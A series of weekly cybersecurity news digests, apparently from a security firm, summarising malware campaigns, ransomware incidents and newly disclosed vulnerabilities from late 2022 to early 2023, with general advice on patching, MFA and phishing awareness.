A new botnet, called HinataBot, aims to infect Realtek SDK, Huawei routers and Hadoop YARN servers in order to abuse these devices for large DDoS attacks. Akamai researchers have examined several samples since early this year and found that the malware is under active development. After devices are infected, the malware runs in the background, waiting for commands to be executed from the command and control server. Spread of the malware occurs by brute-forcing SSH endpoints or using infection scripts and RCE payloads for known vulnerabilities.

Emotet malware is malware that originated as a banking trojan with the goal of accessing remote devices and capturing private data. Emotet was spread via macros in infected Microsoft Word and Excel files sent as e-mail attachments. To circumvent security measures such as blocking macros, OneNote attachments are currently being used for distribution. Therefore, it remains important to be alert and not open attachments from unknown senders that require macros to be activated.

Various vulnerabilities have recently been found in Samsung Semiconductor’s Exynos Modems. Several Samsung smartphones are also affected. An update for the vulnerabilities is expected soon. Until then, we recommend using the workaround.

In this WakeUpWednesday, we will discuss different types of malware and the ways in which they are deployed. This could include exfiltrating data or initiating a ransomware attack. BATLOADER malware is a loader that takes care of distributing a next step, such as data-stealing software, banking malware, Cobalt Strike or ransomware. Currently, BATLOADER abuses Google Ads to deliver secondary payloads such as Vidar Stealer and Ursnif. According to cyber security firm eSentire, the malicious ads are used to spoof a large number of legitimate apps and services, such as Adobe, OpenAPI’s ChatGPT, Spotify, Tableau and Zoom.

Furthermore, HYAS researchers have developed a proof-of-concept of polymorphic malware that uses OpenAI’s API to evade detection. The malware has been named BlackMamba by the researchers. BlackMamba is a keylogger that comes as an apparently innocuous file. Once executed, however, the malware contacts OpenAI and prompts the AI to generate keylogging code. The dynamically generated code is then executed within the context of the benign program, leaving the malicious polymorphic part completely in memory. Each time BlackMamba is executed, the keylogging capability is resynthesized.

Alertness remains important, even when it comes to seemingly innocuous recruitment requests on LinkedIn. Among others, a suspected North Korean group is approaching security researchers with nonexistent job postings to develop three new customized malware families. The cybercriminals use social engineering to trick their target into continuing the conversation via WhatsApp, where the malware “PlankWalk,” a C++ backdoor, is delivered. This backdoor helps the cybercriminals gain a foothold within the victim’s corporate environment.

Finally, focus on the Fortinet RCE vulnerability. This vulnerability is a heap buffer underflow in the FortiProxy administrative interface that allows an unauthorized attacker to execute arbitrary code and/or perform a DoS on the GUI.

In a separate cybersecurity advisory, the FBI and the Cybersecurity & Infrastructure Security Agency (CISA) are coming out with recommendations to prevent a ransomware attack. This is because several organizations in vital sectors have been targeted by Royal ransomware attacks over the past six months. In many cases, the attackers got in via RDP (Remote Desktop Protocol) and phishing. Key recommendations include basic measures such as: making offline, encrypted backups, disabling unused ports on systems that access the Internet, updating applications and systems, applying network segmentation and using multifactor authentication.

Many organizations use cloud solutions and containers. A sophisticated attack campaign called ScarletEel targets these container environments for theft of proprietary software and user data. The original infection was based on exploiting a vulnerable public service in a self-managed Kubernetes cluster on Amazon Web Services. In addition to stealing proprietary software and user data, the attack also included the deployment of cryptominers.

The package Colourfool is a malicious Python package uploaded to the Python Package Index (PyPU). This package contains an infostealer and a remote access trojan. It is part of a new malware called Colour-blind identified by Kroll’s cyber threat intelligence team. Colour-blind refers to the democratization within cybercrime and can lead to an intensification of the threat landscape by allowing multiple variants to emerge from the code of others.

Furthermore, on Feb. 14, 2023 during Patch Tuesday, Microsoft published updates describing CVE-2023-21716. This vulnerability is a heap corruption vulnerability in Microsoft Word’s RTF parser. When exploited, it allows an unauthorized attacker to execute arbitrary code with the victim’s privileges. A proof-of-concept exploit was published on March 5, 2023. Microsoft has published patches and a number of workarounds. The advice is to implement mitigating measures.

Finally, it is important to stay alert for EUFI malware. BlackLotus is the first example where the malware is able to bypass the Secure Boot mechanism. This makes it possible to infect even fully patched Windows 11 systems. The malware can be used to disable BitLocker, Microsoft Defender Antivirus and the Hypervisor-protected Code Integrity (HVCI) – also known as the Memory Integrity feature that protects against attempts to abuse the Windows Kernel.

Privacy regulators have published guidelines aimed at making the use of social media safer. Also known as the EDPB, these European privacy regulators describe in these guidelines about recognizing and preventing so-called dark patterns. These rules are meant to tell both users and social media designers what to look out for when they see certain types of buttons, texts and colors that try to make the user make a choice and take their personal data.

The PlugX Trojan is a real wolf in sheep’s clothing. It pretends to be a Windows Debugger Tool called x64dbg, but is designed to bypass security and take control of the system. PlugX is also known as Korplug and is known for various functionalities such as data exfiltration and abuse of infected devices.

LastPass is a password manager where users store passwords. It has just been revealed that login credentials were stolen from a senior devops programmer. Last year’s investigation in August showed that the cybercriminals had initially captured only source code and other technical information. Now it appears that cloud backups were also stolen. LastPass suffered multiple security incidents last year.

Finally, the police are going to intensify the use of technology in facial recognition in the future. Minister of Justice and Security Yesilgöz indicated that facial recognition technology should not be taken lightly. Initially, it had been decided in 2019 by the then Minister of Justice and Security that the technology should not be used operationally. Since then, the police have been working on a report to answer legal, ethical and technical issues for the operational deployment of facial recognition.

Patching is and will continue to be essential to reduce the risk of a security incident. Fortinet has released updates for 40 vulnerabilities in FortiWeb, FortiOS, FortiNAC and FortiProxy, among others. Two of the vulnerabilities are considered critical and 15 are considered high-risk vulnerabilities. The most urgent vulnerability is CVE-2022-39952, with CVSS score 9.8. We recommend installing the updates as soon as possible.

Forescout researchers have released two new vulnerabilities regarding Schneider Electric Modicon PLCs. These vulnerabilities can allow for authentication bypass and remote code execution by an unauthorized person. The released vulnerabilities are part of a larger set. Successfully exploiting these vulnerabilities can enable a cybercriminal to execute code, provide a denial-of-service or capture (and publish) sensitive information.

The importance of timely patching is also evidenced by a new malware called ProxyShellMiner that exploits Exchange vulnerabilities already disclosed in 2021. These vulnerabilities, known as ProxyShell, are now being used in ProxyShellMiner to mine crypto currency within a Windows domain.  Updates to the ProxyShell vulnerabilities have been available for some time. Morphisec’s blog provides guidance on how to stop ProxyShellMiner.

Responding adequately to critical vulnerabilities is one of the fundamental measures to ensure cybersecurity. For example, a critical vulnerability reported in 2022 for TerraMaster NAS systems is currently being exploited. This vulnerability allows cybercriminals to remotely retrieve the administrator password and use it to log in. Security updates have already been released last March and April. The advice is to install these as soon as possible.

In addition, a warning has also been issued by CISA ( the U.S. Cybersecurity & Infrastructure Security Agency) about the misuse of vulnerabilities such as Log4j, in addition to the TerraMaster vulnerability mentioned earlier. These vulnerabilities are currently being widely exploited to carry out ransomware attacks on critical infrastructure.

Furthermore, the Clop ransomware group claims that by exploiting the GoAnywhere vulnerability CVE-2023-0669, they have now victimized 130 organizations. A patch is available, advised to install it as soon as possible. If vulnerabilities cannot be fixed in the short term, it is important to ensure that proper network detection is in place and that in the event of an alert, there is a quick and appropriate response.

Microsoft on Tuesday released security updates for 75 vulnerabilities, three of which are currently being actively exploited. We advise to install these patches as soon as possible.

Finally, Proofpoint reports a new malware grouping that has been affecting primarily U.S. and German organizations since October 2022. This grouping, called Screentime (TA866), likely has a financial motive and focuses on stealing confidential information. Various methods are used to enter an organization. Regardless of the method used, running the downloaded JavaScript file leads to an MSI installer. This extracts a VBScript called WasabiSeed. This functions as a tool to retrieve next-stage malware from a remote server. One of the utilities that WasabiSeed downloads is Screenshotter. This utility periodically takes screenshots of the victim’s desktop and sends that information to a command-and-control (C2) server. To reduce the risk, you can already take some measures yourself. Make sure VBScripts are off by default and make sure your employees are aware of the potential risks.

A new, flexible tool to easily initiate DDoS attacks using the Passion botnet, is currently being circulated by hacker group Passion. For a fixed monthly fee, a cybercriminal can customize the attack by choosing from one of the 10 attack vectors offered. In addition, the duration and intensity per attack can also be customized. The combination and customizability of this makes it more difficult for victims to mitigate these DDoS attacks.

A zero-day vulnerability has been disclosed for GoAnywhere MFT file transfer, a Fortra solution that facilitates secure file sharing. The attack vector of this vulnerability requires access to the application’s administrative console, which in most cases can only be accessed from a private corporate network, via VPN, or by whitelisting IP addresses (when running in cloud environments, such as Azure). No patch is currently available. As a mitigating measure, it is advised to temporarily disable or remove servlet and servlet mapping.

Atlassian’s Jira Service Management Server and Data Center also face a critical vulnerability where unauthorized individuals can gain access. An update is available. The advice is to install it as soon as possible.

QNAP has released an update regarding a critical vulnerability in the operating system of its NAS systems. Cybercriminals exploiting this vulnerability can remotely execute malicious code. The advice is, if your organization uses these NAS systems, to update these systems as soon as possible.

Last week VMware released a patch for a number of critical vulnerabilities in VMware vRealize Log Insight. Two of the patched vulnerabilities score 9.8 on a scale of 1 to 10 and can be used by cybercriminals in relatively simple attacks and without requiring user interaction. The need to patch has become even greater as researchers are about to release both exploit code and a POC in the near future. Should patching not be possible, we recommend at least taking mitigating measures.

Currently, an updated version of the SwiftSlicer wiper is being deployed to destroy Windows domains. A characteristic of wiper malware is that if data is destroyed it cannot be recovered. Unlike ransomware, where there is still a possibility of recovery through decryption, data hit by a wiper is truly destroyed. SwiftSlicer thereby focuses on overwriting crucial files in the Windows operating system. Currently, the wiper seems to be deployed primarily against systems in Ukraine. Because malware does not let national borders stop it, alertness is called for.

Malware spreads in a variety of ways, including via USB sticks. Researchers have discovered a new version of the PlugX malware spread via USB sticks. This PlugX variant behaves like a worm and infects USB devices in such a way that it hides itself from the Windows file system. This makes it impossible for a user to notice that their USB device is infected or potentially being used to exfiltrate data from the network.

Cybercriminals use a variety of ways to get into organizations. Common ways include exploiting critical vulnerabilities, using phishing emails or taking advantage of a vulnerability at a supply chain partner.

Rapid7 reports that cybercriminals are currently actively exploiting a critical vulnerability in several Zoho ManageEngine products. A total of 24 different solutions are vulnerable, including Access Manager Plus, PAM 360, Password Manager Pro and ServiceDesk Plus. Patches have been available since late October 2022; the advice is to install them as soon as possible.

Emails with included rogue Word or Excel attachments to install and spread malware are less in demand after Microsoft set macros to be disabled by default. Then came versions with ISO and 7-ZIP files. Nowadays, we see cybercriminals more frequently using OneNote attachments in phishing emails where victims can be infected with malware or passwords stolen. OneNote attachments also require user action to trigger malware. A warning does follow from the system that the attachment is potentially malicious, however, many users click this warning away.

Last week a lot happened in the field of ransomware. An overview of the various reports and developments, such as new variants of STOP ransomware and VoidCrypt, as well as information about a decryptor for BianLian can be found here. In addition, Cyberveilig Nederland has published a whitepaper on data exfiltration. The goal of the whitepaper is to gain insight into data exfiltration, create awareness and provide action perspectives.

Updating software is an important way to reduce the risk of a cyber incident. Recently, there have been several publications to warn about a vulnerability in FortiOS SSL-VPN. This vulnerability is being actively exploited by cybercriminals. In particular, government agencies or organizations related to them seem to be attacked by the criminals. A patch is now available; the advice is to install it as soon as possible.

Furthermore, a Proof of Concept (POC) has been published for a number of critical vulnerabilities in popular WordPress plugins. These include vulnerabilities that enable SQL injections. The vulnerabilities found are in the plugins Paid Memberships Pro, Easy Digital Downloads and Survey Marker. A vulnerability in Control Web Panel (formerly known as CentOS Web Panel) is also currently being actively exploited by cybercriminals. This tool is used for managing servers. Patches are available for both the WordPress plugins and the Control Web Panel vulnerability.

Cybercriminals keep coming up with new ways to stay under the detection radar. In this case, they are using a combination of Polyglot files and rogue Java archive (JAR) files to spread remote access trojans such as StrRAT and Ratty. Polyglot files are files that combine the syntax of two or more different formats in such a way that any format can be passed without error.

Finally, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) warns of several vulnerabilities in Industrial control systems from Siemens, GE Digital and Contec.

A large proportion of employees use a smartphone for business purposes. That makes smartphones a desirable target for cybercriminals as well. There have been noticeably more detections of the Android malware SpyNote, also known as SpyMax. After the source code of SpyNote became publicly available through one of the latest variants, called CypherRat, several variants have been developed. Especially financial institutions seem to be victims of SpyNote. SpyNote combines spyware with banking malware functionality by, for example, requesting permission for access services in order to use two-factor authentication codes from Google Authenticator and record keystrokes to take over banking credentials.

As an increasing number of different devices are used by employees within organizations, it makes sense to set up monitoring on the different devices (endpoints) as well via an Endpoint Detection and Response solution.

Research indicates that a variant of the Dridex malware targets macOS systems. This employs a new technique to deliver documents containing malicious macros to users. Although Dridex often masquerades as invoices or other business-related files, that is not necessarily the case here. In fact, this version of Dridex overwrites all .doc files in the current user folder and adds the malicious macro’s code there. In this way, Dridex tries to circumvent the automatic blocking of macros by nesting in files where they might be allowed. Because the code of this macro attempts to download and open an .exe, the impact for macOS users is minimal because macOS does not support an .exe extension. However, users may still unknowingly spread this malicious macro when sharing infected files with other (Windows) users.

The WerFault.exe error reporting tool is also currently being used by cybercriminals to load malware into the memory of a compromised system using a DLL sideloading technique. The malware resides in an ISO file that is sent to the victim as an email attachment. Infecting the system is initiated when the victim opens the shortcut in the ISO file.

In the background, a Remote Access Tool is installed on the system that gives the attacker full access to the infected system. The attacker can then remotely steal data, execute commands and/or move to adjacent systems, among other things.

In this last #WakeUpWednesday of 2022, we have news about ransomware. Leiden University’s employment agency has been hit by a ransomware attack. Cybercriminals encrypted important data and documents such as citizen service numbers (BSN), name and address information, but also employment contracts and salary documentation. How cybercriminals entered the system, who is behind the attack and whether a ransom will be paid has not been disclosed.

Google announced that Gmail will additionally be secured with Client-Side Encryption. This new feature, currently still in beta phase, ensures that personal data in email body and attachments is unreadable by Google servers. You do have to sign up for the beta version though. After signing up, anyone using the following Google products can use it: Google Workspace Enterprise Plus, Education Plus and Education Standard.

Cybercriminals entered Ukrainian government networks with Trojan-infected Windows 10 ISO files. Disguised as legitimate Windows 10 installations, once installed they infected the computer with malware that could steal data.

More on malware as Microsoft warns about a new malware botnet called ‘MCCrash’. This malware infects Windows, Linux and IoT devices. Minecraft servers are often the target of DDoS attacks to thwart or extort players on the server. Microsoft reveals that the malware initially infects systems after users install pirated Windows and Microsoft Office activation tools. The malware then attempts to spread across the network through brute-force SSH attacks on Linux and IoT devices.

Software vendors release updates to fix previous bugs or vulnerabilities. For cybersecurity, having an active patch policy is essential as one way to minimize the risk of a cyber incident. Yet thousands of Pulse Connect Secure VPN servers are not up-to-date. Cybercriminals exploit vulnerabilities in the Pulse Connect where security updates have not been installed. Cybercriminals are accessing through old security vulnerabilities from 2018 and 2019.

The healthcare industry has recently been targeted by targeted Royal ransomware attacks. After news about targeted attacks that left French and Colombian hospitals unable to do their jobs, it has just been announced that U.S. hospitals are now being targeted. The U.S. Department of Health and Human Services is warning about Royal ransomware. This group of cybercriminals is known to encrypt files with a .royal extension and demand payments ranging between $250 thousand – $2 million US Dollar.

More about ransomware. Recently, the municipality of Antwerp was the victim of a ransomware attack. The municipality did not release details, but let Belgian media know that it could take until the end of this month to put back digital applications online. The organization who is responsible, Play, already asked for a ransom. According to the cybercriminals the have at least 557 gigabyte of data that contains financial documents, identity cards, passports and other forms of personal data. If the ransom is not paid by December 19 then the encrypted data will be made public. The ransome amount has not been disclosed. Play is more often successful in committing cyber attacks. They previously succeeded in Switzerland, Bulgaria, the United States, Argentina and Canada, among others.

Yesterday we’ve told you about the FortiOS heap-based buffer overflow vulnerability. The vulnerability is a heap-based buffer overflow in the FortiOS SSL-VPN. The vulnerability gives an unauthenticated attacker the ability for remote code execution. You can track this vulnerability via our blog which we will update when there is news (CVE-2022-42475).

A new digital attack technique has come to light that aims to bypass Web Application Firewalls (WAF). By adding JSON syntax to an SQL injection payload, a WAF cannot detect this vulnerability. Businesses in particular suffer because this allows attackers to gain access to sensitive business and customer information. This attack technique by adding a JSON syntax is dangerous as more and more organizations migrate more business data and other functionalities to the cloud.

Computers infected with malware is bad enough. But this new malware steals files from smartphones and other devices connected as file carriers to infected computers. This malware goes by the name “Dolphine” and searches in connected devices for documents, certificates, emails and media files. In addition, the malware can store keystrokes, save a screenshot every 30 seconds, and extract passwords and cookies from the browser. The stolen data is then uploaded to Google Drive.

Google Chrome has disclosed a zeroday vulnerability several times recently. The most recent is CVE-2022-4262. The vulnerability in V8 allows attackers to execute code within the context of the browser. The browser previously contained several vulnerabilities that attackers could exploit, including CVE 2-21-42298 and CVE-2022-26485. Now it appears that these vulnerabilities also exist in Mozilla Firefox and Windows Defender. Among others, the Spanish spyware vendor, Variston, took advantage of these to infect Linux and Windows computers.

Ransomware remains a hot topic. Such a ransomware attack can come about in a variety of ways. The most common ways are unpatched critical vulnerabilities and abuse of existing user accounts. It is therefore important to have multifactor authentication (MFA) enabled and use a strong password. A short time ago, we provided 8 tips for creating a secure password.

In most cases, a ransomware attack is a time-consuming, annoying and costly event. When it happens in critical industries, lives may even be at stake. Following a ransomware attack in Colombia in which entire hospital data was encrypted, now a hospital in France must also cancel operations due to a cyber attack. Do you want to prevent a successful ransomware attack? Then make sure you get the basics right.

LastPass allows you to manage and store passwords. Yet, thanks to data from a previous hack, cyber criminals managed to access cloud storage and captured data. LastPass states that password data is stored encrypted with which it is unlikely that passwords were leaked. LastPass remains operational and is investigating this vulnerability.

A few days ago, a new version of the media player VLC was released that recently fixed vulnerabilities. With several updates to Windows, the software manufacturer let it be known that a new version of VLC is not available, leaving users working with a vulnerable version. Should automatic updating not work, it is possible to update VLC manually.

The Cybersecurity and Infrastructure Security Agency (CISA) released an Industrial Control Systems advisory this week warning of several vulnerabilities in Mitsubishi Electric GX Works3 engineering software. This software is used in industrial control systems to up- and download programs to/from PLCs. Once inside, cyber criminals can view and even modify modules and programs. The most critical vulnerabilities are known by the numbers CVE-2022-25164 and CVE-2022-29830.

Internet browser Google Chrome is the most widely used browser on desktop worldwide with 77.03% (Source: Kinsta.com). This makes it an attractive target for cyber criminals to attack. Google recently announced that, in the run-up to Black Friday, it had fixed a zero-day vulnerability for the eighth time this year. Following that, Google indicated that exploit code for this critical vulnerability is already available. An update for the vulnerability is now available. Modern browsers update automatically by default, unless specifically turned off by the user. Make sure you are aware of what applications are in use in your IT landscape and whether they are up-to-date.

Researchers at ESET describe a method by which cyber criminals integrate malware into VPN applications. One example is adding malware to the legitimate OpenVPN Android app, then presenting it to users in an alternative way. Researchers say this malware targeted contact information, call logs from Facebook Messenger, WhatsApp, Signal, Viber and Telegram, among others, and other information available on the cell phone. These rogue applications were not available through the Google Play store. Make sure your users obtain or are made available business applications through a reputable source at all times.

We’ll stick with Android phones for a while because rogue apps sometimes slip through the cracks in the Google Play Store as well. For example, Bitdefender researchers discovered, among others, a rogue File-Manager app which aims to infect the phone with more malware. The file manager asks the user for permission to download external files for the purpose of a so-called app update. However, this permission is misused to download malware. One of these rogue file managers called “X-file Manager” had been downloaded more than 10 thousand times. This update contains an APK file that contains Sharkbot malware. The Sharkbot malware targets financial (banking) apps and there to intercept login data or covertly steal money.

The data of 5.4 million Twitter users leaked. Last January, a vulnerability within the social media platform was fixed but in July data of 5.4 million Twitter users was offered for sale on a marketplace for 30 thousand dollars. Meanwhile, the data set was also made available for free on that forum. This information was for sale since August and consisted of a combination of public information and private data, such as Twitter IDs, names, login names, locations, email addresses and phone numbers. It is also rumored that a larger data set of more than 10 million users exists. The available data is ideally suited for targeted phishing campaigns, be aware of emails that appear to be sent by Twitter.

The Netherlands is a country with a strong digital focus. The past couple of years there has been an increase of attention as it comes to doing business online. Cyber security is a topic of big importance for bigger and smaller companies. The government is also making plans to support medium and small business owner to bring their cyber security to the next level. In 2030 every medium and small business owner should be on a certain basic level of digitalization.

This digital adaptation would place the Netherlands among the top three in Europe when it comes to digital technologies. Moreover, these measures are good preparation for the implementation of the revised European Network and Information Security Directive (NIB2) also known as NIS2.

Tomorrow is national “Change Your Password” day. On this day you can take some time to take a critical look at your password and change it. Many today’s passwords are not safe enough. The top five most commonly used passwords are: 123456, Qwerty, 123456789, welcome and password. Tomorrow we launch an article in which we are going to help giving you some guidelines for creating a safer password.

As stated earlier, data is the new gold. If you use the same password for multiple accounts, you run the risk of having your account data traded by cybercriminals on the various marketplaces out there on the Dark net.

Cybercriminals are becoming creative and therefore dangerous. A new ransomware was recently discovered that starts at a Google service. Microsoft warns that cybercriminals have found a method through Google Ads to spread malware through various payloads. This malware loader is known as BATLOADER. The Microsoft Security Threat Intelligence team reveals that this malware loader is being used to spread the Royal ransomware.

Another malware threat is the WASP Stealer, also known as W4SP Stealer. This malware is part of a chain attack that targets Python developers. The Python packages it installs are capable of capturing Discord accounts, passwords, crypto wallets, credit card information and other privacy-sensitive data. This stolen data is then being sent back via a Discord-encrypted webhook address.

In addition, we see that a new version of Typhon Stealer is active, called Typhon Reborn. Both versions have the capacity to steal crypto wallets and bypass antivirus software.

Kaspersky research has revealed that cybercriminals have found a way to steal user data on Android devices via a VPN app. This spying campaign is called SandStrike. This involves attacking the user through a VPN app. This app contains advanced spyware. To seduce and mislead people to download the app, various social media accounts were used.

As for local authorities cyber security is a hot topic. More and more organizations and authorities are taking measures to improve their information security. The Ministry of Health and Sport wants to extend the Z-CERT. Currently, they have Z-CERT for hospitals and mental health institutions, and in time they want to provide the entire healthcare sector with the service.

In the area of critical vulnerabilities, vigilance continues to be required. A serious vulnerability has just surfaced that affects ABB TotalFlow computers and controllers. These are widely used within the oil and gas industry. Cybercriminals can use the vulnerability to remotely take control of devices. In addition, they can read, write and overwrite files.

Organizations are still at great risk by using a weak password. The password “Welcome123” or a variation of it is still being used internally at companies. A newly discovered malware knows how to deal with that. This KmsBot uses Secure Shell to gain access to specific systems in order to not only mine cryptocurrency but also carry out DDoS attacks. The malware “KmsdBot,” as Akamai’s team calls it, targets different types of businesses ranging from gaming to luxury car brands. The botnet infects systems via an SSH connection that uses weak login credentials.

Last but not least, last week there were two updates around critical vulnerabilities. The blog around ProxyNotShell has been updated and a new blog around vulnerabilities in Citrix Gateway has been published.

Ransomware is unfortunately a topic that is going to hunt us more and more. According to the latest report of American federal and financial authorities, there were 487 ransomware incidents in 2020, but 1489 in 2021. All attacks have targeted Windows OS systems. Also, companies paid more for their data. In 2020 companies paid 416 million dollars and a year later even 1.2 billion dollars.

More news about ransomware: the Dutch Minister of Justice and Security announced it will be possible to file a police-report for ransomware attacks before the end of the year. At this moment it is only possible to file police-reports in cases such as an online scam, phishing, or WhatsApp scam.

This past week it became clear that Check MK had multiple vulnerabilities in their software. Check MK has been used for monitoring IT infrastructure on networks, databases, storage, and servers. That means that an attacker can do serious damage because they can access a system without authenticating.

November is Black Friday month. On the 25th of November many stores are offering discounts. For consumers Black Friday is a delight, but for IT departments it’s a time of challenges. When it comes to Black Friday there are a massive amount online purchases, orders, and payments. Please be aware for suspicious emails, text messages or Whatsapp messages about the statuses of your order.

Understanding what devices and software are being used within an organization is essential for efficient and effective patching policies. In this #WakeUpWednesday we focus on a number of critical vulnerabilities where patching is desired as soon as possible.

The NCSC has made an overview of products that use OpenSSL. OpenSSL is used to encrypt network connections and, like Log4j before it, is a component used in very many products. The vulnerability in OpenSSL is not present in versions lower than 3.0.

On Oct. 12, 2022, Juniper Networks published a security advisory describing six different vulnerabilities in the Juniper Networks Junos J-Web interface. In our blog more details about these vulnerabilities.

Previously, we have shared information surrounding the Magniber ransomware and the exploitation of the Mark-of-the-Web zero-day in Windows 10 and 11. Meanwhile, an unofficial update is available.

In addition, an update is available for a critical vulnerability in VMware Cloud Foundation and NSX Manager appliances. Because proof-of-concept exploit code is available for this vulnerability, the likelihood of an attack is high. An update is available, we recommend installing it as soon as possible.

Finally, ConnectWise has made an update available for a critical vulnerability in ConnectWise Recover and R1Soft Server Backup Manager solutions. The vulnerability allowed attackers to access data or execute code remotely.

Getting the deployment of technology right, combined with the correct mindset of employees and setting up the necessary processes, is essential to your cybersecurity. Also in this #WakeUpWednesday, we see cybercriminals using a combination of techniques to penetrate organizations. Cybercriminals then capture data and/or launch a ransomware attack.

Last week, an update was posted around the ProxyRelay vulnerability. Read our blog for more info.

Besides Microsoft Windows users, also Cisco ISE are also vulnerable for a remote code execution  vulnerability in Windows. Successful exploitation within ISE does require authenticated access to the management interface.

Synology’s disk drive manager (NAS devices) currently contains three critical vulnerabilities, all rated with a CVSS score of 10. By exploiting these vulnerabilities, an attacker can execute arbitrary commands on the NAS. An update is available; the recommendation is to install it as soon as possible.

VMware Cloud Foundation is also advised to update due to a remote code execution vulnerability via XStream.

Because employees today often work both at home and in the office, and home devices are also used for work purposes, cybercriminals are targeting Windows Home users through a specific campaign. Cybercriminals advertise fake antivirus and security updates for Windows 10 that actually contain Magniber ransomware.

Another way malware is currently being spread is through the mouseover feature in powerpoint files. The powerpoint presentation appears to be from the Organization for Economic Cooperation and Development (OECD, or in Dutch OESO) and consists of two slides explaining the use of the interpretation function in Zoom. The malware is activated when the victim opens the infected presentation in presentation mode and then moves the mouse over the hyperlink. Thus, no further action or click by the user is required! In this case, too, we see cybercriminals reapplying a pre-existing, older technique. Currently, we see this method of attack being widely used for attacks on defense companies and government agencies, among others.

Phishing remains an important method for cybercriminals to capture user data. Caffeine is a new “Phishing-as-a-Service” platform where users can create their own campaign. Because this platform has an open registration process, essentially anyone with an e-mail address can register. Currently, ads for Caffeine are running on various forums. Make sure employees are regularly trained on how to recognize phishing emails, know where to report a phishing attempt and are aware of their online behavior.

Last week, a proof of concept exploit was published for the Fortinet Authentication Bypass. We recommend that vulnerable systems be updated as soon as possible. If that is not possible, we recommend applying the workaround.

It has since been revealed that nearly 900 servers have been affected by the vulnerability in Zimbra Collaboration Suite. Last week, a proof of concept (PoC) was added to the Metasploit framework, making it possible to exploit the vulnerability without in-depth knowledge of the matter. Zimbra has since released a security solution with ZCS version 9.0.0 P27, replacing the vulnerable component (cpio) with Pax and removing the weak component that enabled exploitation.

Cybercriminals from the relatively new ransomware group Venus are currently actively using Remote Desktop Services to encrypt Windows systems. We never recommend making Remote Desktop services available directly on the Internet. Preferably place these remote worker services behind a VPN solution (with MFA).

On October 13, 2022, a vulnerability in the Apache Commons Text library was announced on the Apache dev list. The vulnerability bears similarities to Apache Log4j (Log4Shell). The difference is that the attack surface of CVE-2022-42889 is more limited due to the specific use of the Apache Commons Text library.

Within cybersecurity, we regularly see older techniques being revamped and reintroduced as new variants. One of these is fileless malware. This is a technique in which malware is hidden within the proprietary processes of, for example, Windows. Because regular, legitimate processes are used, this form of malware is much more difficult to detect.

Furthermore, we see cybercriminals using social engineering more intensively and trying to capture user data in various ways. Within retail and hospitality, credential harvesting and phishing are currently the main ways of victimization. In addition, more than 400 apps have recently been found in the Play Store and the App Store aimed at stealing Facebook users’ login credentials. We recommend using your own unique password for each app, application or account that requires logging in and not reusing passwords. A password vault can help here.

The blog around ProxyNotShell is regularly updated with new information regarding mitigating measures.

Information has also recently been published about Maggie malware. This malware has already infected many Microsoft SQL servers worldwide with a backdoor. Maggie works with simple TCP redirect functionality, allowing cybercriminals to remotely connect to any IP address that can reach the infected SQL server.

Last week, a critical vulnerability was reported in Microsoft Exchange called ProxyNotShell. In our blog, you will find the latest information regarding this vulnerability and the measures you can take to reduce the chance of exploitation.

Furthermore, we see that cybercriminals are also paying attention to the industrial and healthcare sectors. For example, analysis from Outpost24 shows that a group called Shathak, has been actively launching attacks against healthcare, financial and manufacturing organizations since 2019. Medtronic warns of a vulnerability in Medtronic’s 600-series MiniMed insulin pumps.

A new campaign has also been launched by cybercriminals involving backdoor malware hidden in the Windows logo. By using shorthand, the malicious software remains hidden from antivirus software. Setting up an attack initially exploits existing vulnerabilities such as Microsoft Exchange ProxyShell and ProxyLogon. Then the backdoor, which is hidden in the Windows logo, is installed.

Cybercriminals use existing software vulnerabilities and stolen user data, among other things, to gain access to organizations. Currently, a zero-day vulnerability in Sophos firewall is being exploited by cybercriminals. The vulnerability allows them to execute arbitrary code on the underlying system. Meanwhile, a patch is available; the advice is to install it as soon as possible. In addition, the advice is to ensure that the User Portal and Webadmin are not accessible from the Internet.

Furthermore, cybercriminals are currently using poorly secured administrator accounts and rogue OAuth applications. Access to these accounts also allows cybercriminals to add their own data. This allows them to maintain access even if the administrator password is changed. Cybercriminals can thus send spam through these organizations’ Exchange servers. We recommend not reusing passwords and, of course, turning on multifactor authentication for accounts that do not already have it set up.

Also via GitHub, users are enticed to leave their credentials on a counterfeit login page. In this case, the message claims that the CircleCI session has expired and that the user needs to log in again via a link. Another way used is an email saying that CircleCI has changed the Terms of Use and Privacy Policy and that it must be re-accepted via an attached link.

In addition, we are seeing developments where domain shadowing is gaining popularity among cybercriminals. In this method, a legitimate DNS domain is compromised to host sub-domains of the cybercriminal for malicious activities. In the process, the existing legitimate DNS entry is not changed, so the owner is often unaware that the domain has been compromised.

Finally, in the area of ransomware, we are also seeing changes in tactics. To enforce the ransom demand, there are multiple techniques. These range from threatening to publish captured data to targeting individuals or organizations that appear in the set of data or performing, for example, a DDoS attack to make recovery difficult. A new method seems to be holding data hostage and threatening to destroy the data if payment is not made.

Since the beginning of this month, patches have been released by a large number of vendors. The latest patch Tuesday from Microsoft provided updates for several critical vulnerabilities. Updates have also become available for Gitlab, Google Chrome, Adobe, Android, Citrix, Dell and Cisco, for example. Installing updates is one of the essential measures to keep cybercriminals out.

Recently, about 280,000 WordPress sites were attacked by a zero-day vulnerability in the WPGateway plugin. By exploiting this vulnerability, cybercriminals can gain complete control over the website. No update is available yet, users are advised to uninstall the plugin until the issue is resolved.

Furthermore, a warning to be alert for attacks with ChromeLoader malware. This malware steals passwords and personal information and can also install additional malware, including ransomware. ChromeLoader is spread through rogue links in YouTube, Twitter comments and rogue advertisements.

There is currently a trend in the gamer community whereby gamers are being targeted via YouTube videos with links offering cheats and cracks for a number of popular games. Downloading the rar files causes malware, RedLine stealer, to be installed. In addition, it provides access to the victim’s YouTube account in order to further spread the malware through that account. Being aware of what is being downloaded and installed is therefore essential.

In addition to new ransomware variations, ransomware organizations are also changing the method of encryption. Instead of fully encrypting a file, parts are encrypted. As a result, the file is still unusable, but the time it takes to encrypt it becomes much shorter. The Agenda ransomware offers several options in how files are partially encrypted.

The Lampion malware is currently being spread through phishing campaigns using WeTransfer. Be aware of the sender of any request and be alert when downloading documents, even if they are sent via WeTransfer.

Operational technology is increasingly being targeted by cybercriminals. With their disclosure over the Internet, equipment also becomes vulnerable. In that context, several vulnerabilities have been found in medical equipment used to administer medication or nutrition to patients. Measures such as shielding the network via a firewall, network segmentation and timely patching are also necessary for OT equipment!

Malware is spread in very creative ways. For example, a photograph taken by the James Webb Telescope is used as a lure in a Golang-based malware campaign.
Phishing emails with a Microsoft Office attachment act as the entry point to the attack chain. If the attachment is opened, it retrieves a hidden VBA macro, which in turn is automatically executed if the recipient enables macros.

